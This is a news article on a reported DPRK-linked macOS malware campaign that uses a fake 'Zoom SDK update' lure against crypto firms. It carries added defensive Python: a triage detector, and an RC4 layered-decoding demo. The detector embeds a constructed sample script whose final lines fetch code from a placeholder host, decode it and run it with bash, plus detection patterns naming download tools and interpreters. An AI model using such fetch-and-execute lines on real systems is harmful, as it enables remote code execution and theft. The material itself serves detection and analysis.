
North Korean Hackers Deploy New Malware to Target Crypto Firms

The attackers employ a social engineering strategy to target victims, stealing crypto assets and sensitive information.


Over the years, the cryptocurrency space has become a steady target for bad actors engaged in a range of illicit activities. Recently, North Korea-linked hackers have deployed new malware built specifically to go after crypto firms.

According to a recent report, security firm Huntabil.IT disclosed a cyberattack on a Web3 startup in April 2025. Investigators attributed the intrusion to a threat actor operating out of North Korea (the DPRK).

Attackers Targeting the Crypto Ecosystem

In this context, malware is malicious software built to target crypto wallets, exchanges, and other crypto-related resources in order to steal digital assets, private keys, or sensitive information. Such programs can also hijack a victim's computing power to mine crypto for the attacker, or encrypt files and demand a ransom for their recovery.

Beyond the lure itself, the researchers found a diverse attack chain composed of AppleScript, C++, and Nim-based components. Much of the early behavior resembled known DPRK tradecraft, relying on social manipulation and decoy scripts. What stood out was the use of Nim code compiled for macOS, an unusual choice for this group.

The C++ binary is a universal (multi-architecture) Mach-O executable. It drops an encrypted payload called netchk onto disk, and from that point the attack proceeds through a layered obfuscation chain designed to mask its true intent. Its primary job is to download two Bash scripts responsible for collecting general system metadata and more targeted data, including browser profiles and Telegram conversation histories.

Deceptive Social Engineering

According to the report, the attack chain was triggered by a social engineering technique commonly seen in recent campaigns. The attacker poses as a legitimate contact on platforms like Telegram and directs the victim to schedule a meeting via Calendly.

Following initial contact, the attacker delivers an email to the target containing a Zoom link and a prompt to run a script labeled as a “Zoom SDK update,” which serves as the next stage in the attack chain. 

Investigators also found that the script the attackers send looks routine for most of its length; only the last three lines reach out to an attacker-controlled server to fetch and run the next piece of the attack. Before communicating, the malware wraps its data in several layers of RC4 encryption combined with base64 encoding, using three distinct keys across those layers.
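A quick triage check for the delivery trick described above: a script that looks routine except for a few trailing lines that fetch and execute a next stage. The following is an added example written for this article, not code from the report or from Huntabil.IT. The sample "Zoom SDK update" script is constructed for illustration, the host name is a placeholder, and the indicator patterns are my own heuristics.

```python
import re

# CONSTRUCTED sample: a mostly benign-looking "Zoom SDK update" script with
# three fetch-decode-execute lines appended at the end. The host name is a
# placeholder in the reserved .invalid TLD, not an indicator from the report.
SAMPLE_SCRIPT = """#!/bin/bash
# Zoom SDK update helper (constructed sample, not from the report)
set -e
echo "Checking installed Zoom SDK version..."
ZOOM_VER=$(defaults read /Applications/zoom.us.app/Contents/Info.plist CFBundleShortVersionString 2>/dev/null || echo unknown)
echo "Installed version: $ZOOM_VER"
echo "Verifying SDK checksum..."
sleep 1
echo "SDK is up to date."
stage=$(curl -fsSL https://sdk-update.example.invalid/check)
echo "$stage" | base64 -d > /tmp/.zsdk
bash /tmp/.zsdk
"""

# CONSTRUCTED benign control sample.
BENIGN_SCRIPT = """#!/bin/bash
echo "Checking installed Zoom SDK version..."
defaults read /Applications/zoom.us.app/Contents/Info.plist CFBundleShortVersionString
exit 0
"""

# Heuristic indicator patterns (assumptions, not from the report):
#   network: a download tool is invoked
#   decode:  base64/openssl used to decode data on the fly
#   exec:    an interpreter is launched at the start of a command
INDICATORS = {
    "network": re.compile(r"\b(curl|wget|nscurl)\b"),
    "decode": re.compile(r"\bbase64\s+(-d|--decode|-D)\b|\bopenssl\s+enc\b.*\s-d\b"),
    "exec": re.compile(r"(^|[|;&(]\s*)(bash|sh|zsh|osascript|python3?|eval|source)\b"),
}


def classify_line(line: str) -> set:
    """Return the set of indicator names that match a single script line."""
    return {name for name, rx in INDICATORS.items() if rx.search(line)}


def inspect_tail(script: str, tail_lines: int = 5):
    """Inspect only the last `tail_lines` lines of a script.

    Returns (verdict, hits): verdict is True when the tail contains both a
    network fetch and an interpreter launch, the fetch-and-execute shape
    described in the article; hits lists (line_no, tags, text) per flagged line.
    """
    lines = script.rstrip("\n").splitlines()
    start = max(0, len(lines) - tail_lines)
    hits = []
    for i in range(start, len(lines)):
        tags = classify_line(lines[i])
        if tags:
            hits.append((i + 1, sorted(tags), lines[i].strip()))
    tags_seen = set()
    for _, tags, _ in hits:
        tags_seen.update(tags)
    verdict = "network" in tags_seen and "exec" in tags_seen
    return verdict, hits


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        verdict, hits = inspect_tail(text)
        print(f"{name}: suspicious={verdict}")
        for line_no, tags, text_line in hits:
            print(f"  line {line_no} {tags}: {text_line}")
```

This is a triage aid, not a detector: a legitimate installer may also call curl and then run what it downloaded, and the patterns will miss obfuscated variants (variables assembled at runtime, encoded interpreters). The point is that the suspicious behaviour is concentrated at the end of an otherwise plausible script, so reading the tail first is worth the ten seconds before anyone runs a "Zoom SDK update" from email.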
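To make the layered RC4-plus-base64 wrapping concrete, here is an added example written for this article, not code from the report or from the malware. It implements RC4 from its key-scheduling and keystream-generation steps, wraps a message in three layers (each layer RC4 under its own key, then base64), and peels them back off in reverse order the way an analyst would once the three keys have been pulled from the sample. The keys and the message are constructed for illustration; nothing here is an artifact from the campaign.

```python
import base64


def rc4_keystream(key: bytes):
    """Yield RC4 keystream bytes: key-scheduling (KSA) then PRGA."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):  # KSA: permute S under the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:  # PRGA: emit one keystream byte per call
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher: the same function encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def wrap(plaintext: bytes, keys) -> bytes:
    """Apply one RC4+base64 layer per key, innermost key first."""
    data = plaintext
    for k in keys:
        data = base64.b64encode(rc4(k, data))
    return data


def peel(blob: bytes, keys):
    """Remove layers outermost first; return each intermediate for inspection."""
    stages = []
    data = blob
    for k in reversed(keys):
        data = rc4(k, base64.b64decode(data))
        stages.append(data)
    return stages


def unwrap(blob: bytes, keys) -> bytes:
    """Fully unwrap a blob produced by wrap() with the same key list."""
    return peel(blob, keys)[-1]


# CONSTRUCTED keys and message for the demonstration (not from the sample).
SAMPLE_KEYS = (b"layer-one-key", b"layer-two-key", b"layer-three-key")
SAMPLE_MESSAGE = b'{"host":"analyst-mac","user":"victim"}'


if __name__ == "__main__":
    blob = wrap(SAMPLE_MESSAGE, SAMPLE_KEYS)
    print("wire form:", blob.decode())
    for depth, stage in enumerate(peel(blob, SAMPLE_KEYS), start=1):
        print(f"after peeling {depth} layer(s):", stage[:24], "...")
```

Two practical notes. First, each intermediate stage is still base64 text until the last layer comes off, which is why a strings sweep over the binary or its traffic shows only base64-looking junk; you have to recover the keys (they must be in the sample for it to talk to its server) and peel in the right order. Second, this is obfuscation rather than security: RC4 with fixed embedded keys gives the attacker no confidentiality against anyone holding the binary, which is exactly why static extraction of the three keys is the fastest route to readable beaconing data.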

North Korea-linked hacker groups are increasingly becoming a threat to the crypto industry. Earlier this week, the United States Department of Justice charged four North Korean suspects involved in a $1 million crypto scam.


Chris Lion